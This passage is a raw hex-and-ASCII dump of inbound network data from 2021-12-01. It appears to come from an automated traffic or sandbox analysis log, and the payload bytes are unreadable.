ad 0d 6d f2 17 3d e4 00 cd 38 09 2d d2 fc cd 20 98 da d6 33 6e 7d d2 b7 2d d1 73 93 5b cf 03 78 1b a7 06 Data Ascii: pd,R2 K_Mz!$/GjiXg~Vd`bZN%k^v$(_IY'b/F$:'2o}R@>r sG(Y"+>|hH_D0\Lpv~hXNqtJHbN/[TOm=8- 3n}-s[x
2021-12-01 15:23:21 UTC	631	IN	Data Raw: 15 8f dd 9d 1c 7e e5 11 1d e0 ec a1 bd 3d e0 08 eb 47 63 a0 86 22 34 82 3e fa c5 76 ff 53 a0 7d 88 2a 5b ae f5 c1 a0 7e 1b 2d e4 e9 72 ff 56 fa 89 b1 01 40 95 41 8e 53 35 f9 d4 08 d1 30 bf 37 fb 0e 11 1e ae 5d 5c d1 6e 16 91 fb df 96 4a 82 db db de ef aa 9c c3 6c 14 8b 21 55 29 d6 f5 2f 43 40 64 d5 69 77 77 a9 83 40 69 61 40 b6 b8 52 b1 69 e1 7b 83 ab 16 dd 97 d4 e3 09 f0 d6 f3 a6 6e 66 47 d8 e5 8e 44 dd cd b8 b3 06 62 46 7e ce ec d1 e5 1e 23 a1 f6 5f a4 14 85 41 0e 06 31 c4 4a 6a aa 62 5a 3b e2 0d 65 47 ff bf f2 d8 ea 24 b3 9c 95 5c e9 0b 97 4d 22 20 36 70 f0 da ae 85 4f 39 f5 4f a1 6d 6b 72 e1 82 be c7 56 4c c3 2e b1 09 7b 50 0c 72 78 0b 68 f8 54 70 ee d6 d5 aa 69 68 fd 70 d7 95 54 96 fb c3 43 1e c7 d9 e7 36 7b 85 af 99 5b d3 76 1c 39 6d ed 34 51 37 fc Data Ascii: ~=Gc"4>vS}*[~-rV@AS507]\nJl!U)/C@diww@ia@Ri{nfGDbF~#_A1JjbZ;eG$\M" 6pO9OmkrVL.{PrxhTpihpTC6{[v9m4Q7
2021-12-01 15:23:21 UTC	633	IN	Data Raw: c7 5f 44 46 96 dc e9 c5 a6 f2 bb e0 12 10 1e d7 2f ad ec 35 f3 2b 4f ef ad 1c 25 5c 28 27 d9 26 23 a1 63 1a cd 44 9c 7c c3 59 3d e7 92 a8 a2 a3 72 e8 27 61 41 c2 c4 4d 8c f3 a0 71 6c 0c 13 dc fa d1 73 64 50 d4 66 16 08 7c 86 60 20 bd 73 a5 f8 51 3b 01 32 97 35 f4 46 58 a3 7d 02 bc 4c 16 9f 33 d7 68 fa a0 04 3d 0d 66 cd ce a7 26 34 5a a7 1c cf 0e 45 50 bb 2a 9a 46 01 cd 3e 94 d9 f1 60 c9 44 81 47 57 ba 49 05 66 4f 6b bc a4 7d 86 c9 b2 bb ff 8c 27 a2 f7 57 e2 0c e9 a4 a2 72 fc 45 0f 7a 59 34 de 12 16 c4 ce 35 f9 44 0a 24 29 df 96 ba 59 6f 4c 03 67 4c 01 2b 5f 89 ac 09 81 ef 56 3d 7c dc 10 1c 3d 0f d1 6c 0d 61 41 ca cb d4 65 cd b3 8d fb 09 76 1f b8 5a d3 78 f4 56 b2 1d 21 64 c8 ca cd a7 1a 46 2c 17 8c 2e 94 43 95 4f 43 fe d4 be 7f 9a 46 93 25 d7 19 67 43 1d Data Ascii: _DF/5+O%\('&#cD|Y=r'aAMqlsdPf|` sQ;25FX}L3h=f&4ZEP*F>`DGWIfOk}'WrEzY45D$)YoLgL+_V=|=laAevZxV!dF,.COCF%gC
2021-12-01 15:23:21 UTC	634	IN	Data Raw: 9f 6d b7 2c d9 ff ca c7 57 27 48 29 dd 5d 4b e7 15 5a ab 88 f8 57 2c 36 e0 87 b7 c1 c6 5c c8 c2 da ee a1 b3 4e bb 37 fd 35 32 b7 cc 53 aa ec 23 ac 94 af 01 72 7b b8 61 94 d4 79 91 4e b5 f3 41 13 17 9d 1b 21 07 91 d1 14 80 8a 3a e3 0f 9a ac 07 e4 1d b0 85 af 9f a7 dd 8a 27 b0 6f 91 c9 06 7c 00 c7 b3 06 95 56 9d 22 c0 24 a7 e3 13 0a ed 3c 7a 88 cb ca 3f 0a 11 91 a9 8e 34 96 58 33 49 0b f7 c7 c6 22 c2 3e 63 3b 65 c5 47 a0 17 4f 23 32 4d 8f 27 bb c7 4a fa c2 52 b6 29 c5 c5 aa 8e ad 11 ed 26 4c 4d 0c e2 02 17 7c 94 31 2c 3f 3f 69 3a 76 8a e9 e7 a9 cc 68 72 11 12 5d df df 90 4b 1c 3a 83 37 0d 76 b5 57 95 51 23 a6 6e ea 29 40 5b 58 a1 ee db 74 2a 44 88 32 49 f0 ba 2b ca ca c4 c4 30 84 a2 f9 c2 d5 6b 77 a7 c1 d3 74 e1 16 c3 4d 93 e9 00 58 bc ad e7 f3 b2 02 ec 2a Data Ascii: m,W'H)]KZW,6\N752S#r{ayNA!:'o|V"$<z?4X3I">c;eGO#2M'JR)&LM|1,??i:vhr]K:7vWQ#n)@[Xt*D2I+0kwtMX*
2021-12-01 15:23:21 UTC	635	IN	Data Raw: a5 8c 3d 73 52 61 4c 74 13 f4 d8 ba 33 c4 d9 78 11 98 55 c4 45 5a 5b 6b c4 d1 8d 61 a2 96 b6 f0 a3 ad 12 12 84 17 94 c8 f8 86 d5 ad ad 94 d2 d0 02 0b 14 0a 62 ce f9 40 39 a5 f3 ac 81 75 c2 02 e0 39 57 1d 4f de 88 ad 0d e1 06 f8 c4 42 95 37 6f e6 e2 eb 28 8d ee 16 84 1a 80 1e 3b f4 10 06 b8 b2 8b 29 ef 49 be c2 18 e6 ff 53 b1 42 65 d7 93 fb 23 51 c8 3b 0a 1d 5b a0 83 58 a2 1c b5 51 f7 cc cb 5f ab e7 72 75 d7 9c 12 0f 1f 7d 92 b1 4d e7 1b c1 ce 74 e2 9c f5 94 4d 04 fb 5b 34 91 3c f1 99 0a 0f 9b ff ca 07 6b 8f 9b 90 5f 4d 04 69 4e a4 9a 7e 08 f3 0c e0 25 ff 1a a3 88 70 b3 76 e0 88 59 a1 ab 4b 04 f4 45 84 ba be 36 ff cc 26 98 30 b9 e3 84 3c 6e e8 ac 08 26 27 ad 00 7f fe b4 42 08 06 94 d8 7b ea 5d c5 01 ad 12 1d a0 e4 f0 00 5c 2a 7c 92 a7 c9 c0 50 80 95 23 99 Data Ascii: =sRaLt3xUEZ[kab@9u9WOB7o(;)ISBe#Q;[XQ_ru}MtM[4<k_MiN~%pvYKE6&0<n&'B{]\*|P#
2021-12-01 15:23:21 UTC	637	IN	Data Raw: 0c e1 50 a2 b2 89 4f a9 ac 8b 5f b2 ce 1b a0 72 e2 9d d6 f6 b2 ee 45 28 a3 72 90 c1 1d 73 7c 15 81 73 63 54 b4 b9 a1 73 34 5f 54 b4 76 07 9c 54 2b 83 ad 15 81 af 7e 58 11 9e 6f ff ae 98 8b a0 6e e8 3c 2b 20 cb 40 6c 77 a3 ee c9 d0 76 45 17 9b e4 fc 07 69 0a e5 80 95 30 11 6e d0 d0 5c ce fd 07 7d 8c 2f d6 79 00 e3 80 0e 0c 1c ac 14 70 0d 24 c3 e5 82 39 60 2f 94 be dd e2 b7 36 67 db 00 dc 80 94 11 79 4a b2 81 bc a3 0d 24 f5 62 ca cc 5a cd e7 19 c3 ab 7f 70 61 06 68 bd 33 c6 d5 62 21 4d ba c5 94 49 06 f6 58 34 d9 6c f1 a5 e8 d3 90 c6 88 3a 7f 9d fc 0c 58 15 83 aa 48 94 4d 09 72 7c 9c 74 e2 0b 63 b1 f8 c3 7c 03 79 9e 69 3e 92 e6 0d 7b b1 bd 98 5d 5c 3e 93 a0 85 11 94 48 1d 5e 73 9c e0 9e 79 91 da ff 29 a8 70 6a e2 0b fc ce eb b6 ba bb c9 0e ac 23 ac 97 2f 5e Data Ascii: PO_rE(rs|scTs4_TvT+~Xon<+ @lwvEi0n\}/yp$9`/6gyJ$bZpah3b!MIX4l:XHMr|tc|yi>{]\>H^sy)pj#/^
2021-12-01 15:23:21 UTC	638	IN	Data Raw: 3c f5 36 ff 88 72 6e 81 3f 91 28 fb 1f 6c 54 76 83 0d 69 90 f0 a2 20 26 85 08 bf dd 5b 9d b9 c7 fb bc cc 69 fc 74 f2 0b 39 9b 6a 41 58 b5 69 93 5b 3e 46 47 a6 16 be ab 35 21 0d 9d 70 1a bf 74 02 1e f8 c3 fb 57 3a 1b fc 74 3b 47 b8 ef 9b b9 5f 2d 09 b1 13 24 ed 27 e7 0f 5e 84 1e 87 c9 60 98 c3 ed 22 c0 49 9b bb 5f 52 ec d0 62 53 60 77 61 69 7d af b4 41 39 28 dc fa fc c7 4a a4 23 cb 97 a6 6c 8d 2b fc 7b c4 db 8c 88 4c 65 f3 3e 27 a3 75 2c 4f f6 df c0 33 ff 35 7a a6 66 41 02 99 b0 50 12 6e f6 23 d4 e3 d4 13 9e 9e 96 5d 1b 29 7e f9 7b cc 1d 89 55 a8 19 67 e4 ac 81 ed f3 f4 2c d4 c3 4d 83 f5 51 11 26 be 9a 23 60 40 d1 8b ac 59 09 09 cf 73 86 04 9b 84 f5 de b4 e1 7e 45 d7 3a 0a c7 00 a7 15 3f bf 1e f9 c0 0f 04 f4 fe 49 07 b7 b2 c9 d7 5c 02 9c 19 ba 37 77 7c dc Data Ascii: <6rn?(lTvi &[it9jAXi[>FG5!ptW:t;G_-$'^`"I_RbS`wai}A9(J#l+{Le>'u,O35zfAPn#])~{Ug,MQ&#`@Ys~E:?I\7w|
2021-12-01 15:23:21 UTC	639	IN	Data Raw: 5d 01 d9 f4 40 84 c8 2d 94 1d 1e 38 6c 6c 90 5d 2b c2 78 1f ad 84 b3 ec 0c 35 30 4c 85 1d 58 b9 a1 1c c8 df 17 74 f6 d7 e3 9d ea 00 37 08 58 cc 3b 7c 33 37 94 2c a9 8d ea d1 e3 57 32 c4 d1 b7 23 1a 6a 0d 9c 45 f4 cd 90 49 d5 7d 45 17 9f f0 2f 02 fc 45 06 f0 e9 b5 d9 0b 66 c5 5b 44 9f 91 4b 0b 63 49 02 e4 42 bc 09 6d 75 04 94 a2 fb c6 4c b2 57 c3 c1 46 02 7f 8a b8 a8 4a 90 bd d4 20 36 8f 92 74 09 6e e9 23 c4 35 5b 41 18 08 83 6c 60 43 0f 4f 3b 61 5f 4d 91 2e 53 d4 18 e2 f6 65 1c d3 74 e1 16 95 da 20 20 33 ce e4 00 cc 10 1d a6 72 fc af c8 c5 b4 d7 77 9a 47 14 16 95 40 78 6d 8c 84 37 e4 94 7a bc 3c 6c 6e d1 bd 79 66 7e 30 a0 8f b7 a7 d6 38 a1 7f 6e 28 4c 07 76 15 04 70 e4 ff 31 22 d2 bc 3d 19 87 b3 95 f9 33 37 92 49 0f 9a 47 11 27 c3 aa 6d 13 19 95 40 e0 0b Data Ascii: ]@-8ll]+x50LXt7X;|37,W2#jEI}E/Ef[DKcIBmuLWFJ 6tn#5[Al`CO;a_M.Set 3rwG@xm7z<lnyf~08n(Lvp1"=37IG'm@
2021-12-01 15:23:21 UTC	641	IN	Data Raw: a1 ee dc e6 49 b3 05 73 66 5d 3a 8f 90 ab b5 20 3e ea 63 39 f7 df 9b 7b a2 79 90 c1 58 aa f7 56 40 66 c5 52 b4 f5 d5 fb ae 80 1e 3b f4 90 d7 c5 ef a1 07 03 84 ca c0 b8 2e d8 eb af 08 e8 fd c8 0a b0 94 48 80 8b 37 1f b7 35 e4 e1 7c e2 ed ff af eb ae 82 a7 8f 3b 73 fe 32 5a af 1e a9 2d 06 51 f0 ac a1 3c 73 66 cf 6c 30 a7 7c 30 9a 49 0d 60 d5 b4 aa 00 f1 7c 1d b9 37 f6 9b e8 b8 61 c1 45 c8 24 af 99 2a e9 2a cc 23 30 40 7b 55 7e 97 3b e4 71 c9 bc 56 09 50 54 21 eb 5e be 3e fb c7 9c 51 21 b6 b6 2a 07 8b a7 e5 81 41 f0 4f 3e 60 dc 07 34 20 93 dd 83 22 49 0f 12 82 32 53 2b da 1b 44 a7 af e4 01 41 8e 63 51 ad 6b b7 5f d9 39 34 5f 50 b6 3d 7c 19 17 15 41 10 1c 3d 77 7d 63 da ba df 98 46 94 d4 69 3e 63 4c 8a d3 ec 24 af 99 d6 7c 55 d8 f6 5f 56 50 00 b2 7c 10 f4 53 Data Ascii: Isf]: >c9{yXV@fR;.H75|;s2Z-Q<sfl0|0I`|7aE$**#0@{U~;qVPT!^>Q!*AO>`4 "I2S+DAcQk_94_P=|A=w}cFi>cL$|U_VP|S
2021-12-01 15:23:21 UTC	642	IN	Data Raw: 5c 31 c0 ae 01 74 09 f5 ea fb 2c c6 5c e6 e7 7d b6 09 77 8b a5 7d ea 3c 2a 17 8e 50 a0 4e cd b1 1f b1 34 56 b2 88 2b 72 11 8f 4f 65 2b dc 0a e9 a3 9d 72 63 40 7b ec b0 02 f6 dd 0c c0 5d b0 6b 33 d4 f6 5c d8 74 6b 73 07 63 80 92 cf b5 34 59 26 b4 2e 49 93 3a 78 d4 f2 d3 93 4b 8f e1 69 84 77 8c 81 b1 15 11 fb 20 b3 39 33 df 24 66 8c b1 17 91 d2 51 24 a6 94 6b e1 1d d0 fb ca ca 38 9b e2 4c 71 e2 8c 06 6c ae 41 1d b5 2e 3d e3 93 db 87 2b 4e 68 fc 4c 81 2f 49 26 f6 59 e3 84 e3 86 b6 8f cf 87 49 ff bd f6 44 9a 48 00 34 64 0d 66 38 8b 38 fb 97 b3 a8 81 b0 95 56 3d cc 2c b5 02 62 c8 d5 68 6a 0b 6f a7 44 0f 0e 2c 56 af 0e ef 41 e4 fb 89 8c 26 3a 74 71 52 35 65 0c 9b 16 97 c8 36 ad 04 6f f6 ce f1 a3 e8 d2 1d f5 35 b9 2c 5b db f5 cb c1 2e 9a b7 b4 2f 5f 55 37 f7 23 Data Ascii: \1t,\}w}<*PN4V+rOe+rc@{]k3\tksc4Y&.I:xKiw 93$fQ$k8LqlA.=+NhL/I&YIDH4df88V=,bhjoD,VA&:tqR5e6o5,[./_U7#
2021-12-01 15:23:21 UTC	643	IN	Data Raw: ed 71 b6 47 2f 84 04 ea 3b 76 78 12 f8 26 95 f0 33 c5 c5 6e ee b6 88 fb 07 ba a9 8c a8 a6 85 27 34 5a b7 38 72 15 04 a8 d6 e5 88 37 00 58 3a 0b 82 c5 14 ae 27 a5 e7 18 6f 82 ba 32 55 3f 3d 09 f0 a0 0c f7 dd 94 ab 84 cd 30 ac dd 46 95 d7 67 da 8f c3 c3 6f 78 8a ff d5 6d 75 06 63 07 8a d5 2a 10 13 9e 65 c3 30 51 f6 c3 45 0d 66 3f a9 2e b2 85 bb a3 9a 5f c5 3a 00 c3 5c d2 ee f4 47 c7 49 f5 91 4b fe 4a 8c be ca d4 69 ff db 90 58 39 1f b9 2c 5b b4 4a 10 62 38 17 c4 67 65 57 49 10 c2 34 25 58 35 be 20 74 f6 56 a8 9a b2 63 be 02 c8 0a e9 a2 63 5a 59 b3 94 41 03 74 e6 fe 8a b5 a6 6d 75 90 48 c2 e1 50 a7 ec be 7a 07 ac 84 a2 40 73 62 cd 4a 6f 9b b0 d1 a0 75 9b 6c c6 7b 8a 2b d1 81 36 e2 1e 34 4d 18 ff 75 fc a9 d5 f7 4d 00 cc c5 54 8f bf c0 a6 63 db a3 46 09 56 6d Data Ascii: qG/;vx&3n'4Z8r7X:'o2U?=0Fgoxmuc*e0QEf?._:\GIKJiX9,[Jb8geWI4%X5 tVccZYAtmuHPz@sbJoul{+64MuMTcFVm
2021-12-01 15:23:21 UTC	644	IN	Data Raw: 2f d7 03 d8 77 15 9d fc 49 94 b8 14 2e 4f 32 57 2b 4d 7b 48 99 46 0f 72 e2 0b 69 43 f0 d8 71 21 44 fc e4 87 20 7c 1f ea 39 8e b6 2e 0b e9 c2 34 44 9e 78 f0 d5 dc 7a c1 40 7f 8c 3a 9c eb 21 e1 8e 5b 5a 5e 78 50 72 7b 1d c8 c4 ce fb 89 e8 df 9a 50 34 9f ef 31 e4 46 93 d3 76 e0 82 b6 fc a4 cb 2d 2d b7 a8 d4 0f 9a b2 9e 1b 3d 98 d0 fc b7 30 7b 0e 16 8c 24 9c 7d e4 8a 2e d9 60 59 2d 06 66 5d 5b 19 f6 b4 b0 99 45 7f 6f f1 2b 97 c8 cc c7 aa 59 3e a1 2d 04 3c 90 1e 2f f8 4f 3a e0 24 37 16 72 f3 0d 63 42 1b df 81 20 04 ef 37 8a 29 d5 7f 12 4c c7 49 04 e1 76 d2 f6 9a 93 05 ab e8 71 11 f6 56 ae 13 fe 5a 46 ac f5 79 80 01 d8 86 3f 75 f6 4f af 6a fe 49 1b 32 dd a6 6f 76 14 f4 9a 5f 97 0d a1 2b 23 d1 57 15 83 a6 f1 92 4a 66 b0 a0 d4 fe 5f ce 8e 46 17 b3 14 8f 4f 38 70 Data Ascii: /wI.O2W+M{HFriCq!D |9.4Dxz@:![Z^xPr{P41Fv--=0{$}.`Y-f][Eo+Y>-</O:$7rcB 7)LIvqVZFy?uOjI2ov_+#WJf_FO8p
2021-12-01 15:23:21 UTC	646	IN	Data Raw: 19 71 14 10 63 53 36 b3 f4 d3 25 69 70 f0 26 d9 f4 d4 9a a7 df 2e a9 08 ed 23 20 69 89 24 d4 90 84 d9 93 ab 39 e7 83 b2 08 6e 81 5c 4e 3f 93 12 f2 d4 94 7b 98 4b 1a 92 61 f6 ec db 89 7e 0b b4 23 5b 59 bb f0 5f 8e 81 63 e9 66 df ac 9d fa 57 26 c4 4e 78 f5 a2 8d 9e 15 7b 96 4f de e5 64 8d e0 f8 53 36 e2 60 c3 6f 7f 87 b7 36 94 b3 ec a2 28 b6 d3 0d 89 dc d1 51 08 60 41 97 0c 2a f3 a1 dd 62 54 c7 d2 b0 08 ed bd 33 38 83 37 25 b2 01 d5 2f 2e bc 13 ee 60 6d 3a 76 1e af 62 db 11 a5 38 62 22 d5 e0 5d a5 d1 e5 1f d1 6a ff c4 21 23 5c 9e 8b 99 6f 22 29 d9 f2 19 98 ba fa 53 ab 84 3e fc cc fc 46 80 18 ca d7 61 56 a7 04 b3 21 40 65 42 09 f0 6a fe 42 90 bb b7 1e 78 1a 18 02 0d 18 0b 81 bd 21 29 ba a5 d5 e8 39 f5 da 74 23 17 8b 34 d3 07 7f 9d fc a4 85 49 43 bb 48 8b a5 Data Ascii: qcS6%ip&.# i$9n\N?{Ka~#[Y_cfW&Nx{OdS6`o6(Q`A*bT387%/.`m:vb8b"]j!#\o")S>FaV!@eBjBx!)9t#4ICH
2021-12-01 15:23:21 UTC	647	IN	Data Raw: 8b a5 e4 09 79 90 c9 46 18 4b 17 f5 7d 9d cc a2 61 c1 53 9f f4 51 30 d8 35 fe 5d 2c 4c d0 c3 35 fc 4f 31 4c 52 a3 79 a2 c8 90 80 8c cd d3 83 ba d9 06 e8 a6 9f fc da 99 c9 3a cd 22 b3 d6 fe 7a 3e 7c 9b 60 d1 ef 9b 49 68 ea 52 3b 66 c2 c1 56 b0 b0 b8 8d ad 00 c2 4c 70 fa c9 6e 03 2d 1d 20 ca 4f 46 a0 14 06 73 ea 31 52 36 77 09 5e dd f6 e6 68 60 2e 57 8a 6c e5 e7 0d 94 44 11 74 ed 80 65 41 0c 82 20 68 ce cf 79 91 da 65 ca c3 c1 df 86 11 47 80 ef 3c 99 db 1e e8 32 7d a6 70 78 1a 0d 1e 9f fc d3 f8 43 b7 5a b8 cb dd 07 7b 19 15 82 00 a3 ee 34 2a 4e 3a 49 3f e4 03 7c 93 27 ad 8a 47 0b 3b 36 f9 28 d3 f0 2f 41 94 44 fa 6e f4 cb 34 c0 57 29 40 bf 28 53 4b a9 6b ca b4 8a 4d 00 d9 2e de e2 1a 19 83 b5 5b 71 17 82 27 af 90 d7 63 d9 e9 b4 2b e7 78 4f ed 21 44 03 9b fc Data Ascii: yFK}aSQ05],L5O1LRy:"z>|`IhR;fVLpn- OFs1R6w^h`.WlDteA hyeG<2}pxCZ{4*N:I?|'G;6(/ADn4W)@(SKkM.[q'c+xO!D
2021-12-01 15:23:21 UTC	649	IN	Data Raw: ac de 90 10 ac 06 0e 0b f7 53 2b 24 c1 cb 9b e4 e3 13 5f 50 0a db f3 21 ce 57 9c f6 dd a8 1d d3 fc c1 d1 fa 3d 64 af 96 c0 20 bb 18 86 0e 9d 72 7d 6f 09 f7 e0 ea c4 23 4e d7 e1 f0 d4 10 e4 f9 b8 37 b3 f7 28 9e a5 8d 37 8b 64 1f 79 57 12 80 74 2b 17 57 e3 e5 0b 2a 99 00 07 b3 64 56 e7 47 df 56 78 26 a9 50 7c d6 3f 2f fd 40 26 f3 62 17 5a cb cd 49 ae 29 7b 3e 5f db 91 66 63 fb 6e 81 3d f7 64 7f 32 fe de 16 d0 27 ec 29 4c 0b 62 d8 d9 8e 42 f9 95 d4 f2 43 eb 41 2a cf 76 0f a0 8d aa 8e 66 3e 6c f9 49 46 8b 92 1d a2 43 50 b4 ab 6f 71 00 33 35 c8 5b a5 e3 96 29 37 ef ae 95 a9 ea 2f d0 61 03 6e da a8 89 a6 17 90 23 a1 9b f7 e3 79 64 fe d1 86 34 56 9b 0b 6d 63 d0 b4 0a fe 7d 73 8e 63 c0 43 02 6c 9a 53 b7 0d 73 ce 9b 24 09 e5 7a 02 43 24 f6 ab 07 4d b2 22 18 45 05 Data Ascii: S+$_P!W=d r}o#N7(7dyWt+W*dVGVx&P|?/@&bZI){>_fcn=d2')LbBCA*vf>lIFCPoq35[)7/an#yd4Vmc}scClSs$zC$M"E
2021-12-01 15:23:21 UTC	650	IN	Data Raw: e1 cc 2a ac f2 17 6b e4 4f b5 43 0e 04 fa 57 d7 96 da 33 dc b7 31 7e 6f 09 af dd 54 75 8c 6c c9 5d 5f c6 bc 93 a0 9e 6c 99 51 2f 4a 91 e7 91 b4 2b b1 af 37 62 cb f9 45 9b ec 3a 63 50 bc 30 de 1a 05 76 1a 05 c2 5b 50 bb 21 bd 2a 8b cf de 2d 5e 87 be bc ac 9c 78 72 74 fe 46 8f d3 74 f1 9b a9 00 c3 59 2e 5e cb 20 a9 b8 a8 06 be ab 0c e3 05 b0 88 ae 0c 8f c5 5a a7 e1 05 e4 95 d7 6f 60 c3 5a 30 1b 1e 3d f1 a2 61 cd 1b ac 85 ae 88 2e f4 de 8e e7 84 3d ee 2b 65 44 97 da e3 58 92 f6 61 f4 2f a9 9c 75 90 4a 93 d7 d3 f6 57 ff 18 93 07 6d 8b e7 9a de 92 c2 d3 7e 18 09 e7 6a 4c 9c 4e 28 db 8f db 9e 7d 83 8f 99 d2 c8 ad ab 17 8b ab 07 61 73 f9 c6 dc 02 f8 44 a4 f8 cf 65 5e d1 77 83 de 41 a6 66 c6 d5 68 ea 02 95 4a 1e 25 ad 0f 93 cb d8 19 9a 54 84 c1 de 46 2c 5a ba bf Data Ascii: *kOCW31~oTul]_lQ/J+7bE:cP0v[P!*-^xrtFtY.^ Zo`Z0=a.=+eDXa/uJWm~jLN(}asDe^wAfhJ%TF,Z
2021-12-01 15:23:21 UTC	651	IN	Data Raw: c5 26 de d6 e4 e4 42 26 5b 50 a0 e9 df 3b 6a cd 9b 5c 52 35 fc a8 a2 07 6a ff c5 cc 2b d1 e5 0c f8 47 9d 73 7c e8 c5 bb 57 42 86 31 cf fa 31 d2 cd 47 14 16 0c 72 a1 0f f1 1e 0a 62 8f 34 2a d7 d1 6e ba 91 3f 07 23 ef 98 de 36 00 b3 fc da a4 e7 cb 54 a5 e2 02 28 51 34 46 9d 76 81 b1 1d a3 ec f7 d0 01 27 38 74 ed b6 bf 23 e0 1a 0d 63 4d 90 76 03 a8 99 d4 f5 da a8 48 71 63 49 9c 11 85 51 a0 e3 8e 52 b1 05 86 48 7c 28 50 a6 f9 4d 17 19 b6 a9 81 32 5c d3 72 ee aa fe 9e 62 42 8a 13 85 21 2e 4d 03 a6 66 48 06 f1 b2 b7 32 b9 bd 4b 64 d6 e9 b3 e5 1c f8 56 53 cd 0e 79 95 c0 b0 71 58 a0 71 6a e3 3f 0b eb 3d f2 cf 84 76 fc 5d 41 13 08 81 5c 2b 47 5b ad 73 33 4c 3e e8 db 05 09 ec 78 ec 26 2c 44 48 88 34 48 97 51 af 78 51 30 4f fc 4a 66 f4 c1 27 9f eb b9 29 94 83 be a0 Data Ascii: &B&[P;j\R5j+Gs|WB11Grb4*n?#6T(Q4Fv'8t#cMvHqcIQRH|(PM2\rbB!.MfH2KdVSyqXqj?=v]A\+G[s3L>x&,DH4HQxQ0OJf')
2021-12-01 15:23:21 UTC	653	IN	Data Raw: f9 c2 43 75 44 6e 56 9b 98 db ea fa 5e 0b 6a c9 c1 1c ee 29 71 77 a9 92 18 c8 d4 20 37 92 df d5 ad 16 0a e7 0b e9 f3 35 6d 71 e4 8d a7 63 c1 54 3f f4 44 41 0e 7e d7 6d 73 65 8a b7 bb 5c 29 a0 c1 58 a9 07 ba b5 12 ee 34 47 1f 5c 3e a9 81 5b ca 8d f7 db 98 41 de 11 03 f9 90 bb d2 b3 23 a7 fb c8 5c e9 58 59 c0 2f 85 44 f0 62 7b 20 61 05 3f 52 17 ee da 65 0d e7 cb 19 8f c6 d4 76 85 aa 29 ba 55 d3 cf 3c ec b3 87 2b 5d c1 c0 2a c0 36 e5 12 8b 24 a4 f2 b2 dd 0e 89 f5 4b 9a 6c 68 71 30 ab 8f 44 4f 38 71 62 2b 29 4c 64 cf e2 f0 39 66 2b 9d 6e 07 4e 29 39 8d 3d bc 76 01 4f 3a 3a 27 79 95 ca 56 c8 c7 ce c8 d0 79 32 5e d1 79 75 99 36 5c 50 3b e5 73 ee d8 cd bc 6b 73 98 d7 e5 b4 de cc a9 15 91 3a 41 95 fc b1 5b 90 a6 53 bb 14 ce c8 a2 78 7c 87 9f dd cd cf fe 7e 88 18 Data Ascii: CuDnV^j)qw 75mqcT?DA~mse\)X4G\>[A#\XY/Db{ a?Rev)U<+]*6$Klhq0DO8qb+)Ld9f+nN)9=vO::'yVy2^yu6\P;sks:A[Sx|~
2021-12-01 15:23:21 UTC	654	IN	Data Raw: 58 36 40 d4 77 aa 83 3f 42 9b ff c0 32 c7 d7 fe 14 fb c8 c9 46 18 97 33 c1 52 ac 6a 09 9a 32 a8 96 42 84 a3 7a ea 3a 76 1e ce 04 bf 52 bd 2e 41 94 1f 53 31 ca d1 e7 12 f4 45 13 92 a3 12 e2 42 74 92 50 bc 3b 72 1a 10 1a 05 bf 8b 56 76 1c a7 7e 80 f3 25 29 59 25 ae 94 bf dd 67 d2 ac 68 fc 49 06 1e d5 94 ba c5 0e 5b 58 a8 18 6a 71 ea 52 69 da 7f a7 95 cc c2 d8 76 80 2c 53 3f f5 49 88 65 a6 8f 38 39 dc 0a ee 21 28 7d 41 1f bf 3e 97 32 bc 94 d7 16 0c e5 77 71 2b c4 a8 81 b3 87 db 70 03 88 b6 c4 3c 07 7b 7f b4 dc e4 92 10 81 fc a4 9a d9 83 51 cb f6 4c 70 67 94 51 ba 2c e8 33 db 9b 64 1a 1c a9 c4 dd 07 af 43 84 e3 c1 d4 60 9a d1 6c e6 c5 4e 2e 52 a8 48 23 7a 14 13 8a 31 02 f8 b7 3f e0 5e 51 7e 0a f8 c1 17 19 ac 87 a1 82 30 43 1d b6 77 94 df 5a 06 ea b9 3d 80 06 Data Ascii: X6@w?B2F3Rj2Bz:vR.AS1EBtP;rVv~%)Y%ghI[XjqRiv,S?Ie89!(}A>2wq+p<{QLpgQ,3dC`lN.RH#z1?^Q~0CwZ=
2021-12-01 15:23:21 UTC	655	IN	Data Raw: 04 04 ca 53 a4 75 06 13 91 27 51 d5 23 19 8e 44 97 52 da f3 3b db 44 e3 13 52 5e 68 a5 a4 70 f0 2f 1f be 66 6d f4 bc b6 46 63 a8 d8 cf 7a 15 8a b1 6b 67 d9 f5 da 72 76 34 48 97 cd ae 6a 05 3e 14 27 a5 e6 9d 18 16 7b 92 9a d3 fe 59 b5 a6 a5 e3 8e 53 b7 2c d9 8e c7 c6 39 3b e0 f7 3c fa dc 1a f3 5c 97 8a 2a 5c d8 7b ed 43 80 98 9e 6f 63 53 82 5f 93 5b c6 4e a2 fc 16 6e f2 2b d0 04 1e c8 82 49 6a f7 ca 5c 57 c2 5f 35 f3 12 77 5f 45 85 ad 17 50 a4 f0 38 66 1c dc 8b 3f 37 fa 52 b8 38 44 82 85 87 61 44 09 e1 91 2c a7 0c 1c c7 a8 dc b6 c9 4e bd b1 6e 01 d0 02 f7 36 87 4c c3 45 7b 94 49 92 c2 c3 b4 54 c2 13 ee 26 3a ea b9 35 04 07 3e 94 35 f3 b0 1d 3d f3 21 ce 00 72 ec f4 42 f8 5e 56 36 e0 81 39 2d 30 54 6d 65 d4 b3 ac 8b b4 bc 53 c7 25 c0 95 c8 c0 24 44 8f 3c 86 Data Ascii: Su'Q#DR;DR^hp/fmFczkgrv4Hj>'{YS,9;<\*\{CocS_[Nn+Ij\W_5w_EP8f?7R8DaD,Nn6LE{IT&:5>5=!rB^V69-0TmeS%$D<
2021-12-01 15:23:21 UTC	657	IN	Data Raw: bc af 0a 7b 00 cc cf 9e e4 9c 0a e1 96 4f cc 58 c8 65 43 03 7e ff 85 6f 26 26 21 37 91 35 0a 1b 27 e0 e0 78 f2 02 20 0e 33 36 f6 1e b9 46 9e 6b 75 95 2f 7e 33 09 6e f0 2f cb a6 f9 54 b9 3f e9 a4 95 fd 43 10 00 c5 5a b1 d5 f1 39 f7 ca c7 56 e0 2b 94 49 0c 72 31 cd d5 70 71 81 b7 dd 58 b0 72 19 e6 9e 63 4f 23 a2 75 d8 d4 8c 24 2c cd 2d 34 d3 11 42 81 0f f1 58 2b 9a bc 9f 64 4b 12 99 42 92 a2 bc a7 f9 d1 70 7b d4 e4 0d 6c e5 79 53 3d 14 e7 f3 ca a7 fa 57 b8 8e af 94 7d 58 e2 97 9f fa 5c db 9b 6c 71 61 a3 16 f7 9f a0 06 e9 bd b0 1f bb c0 d8 8f 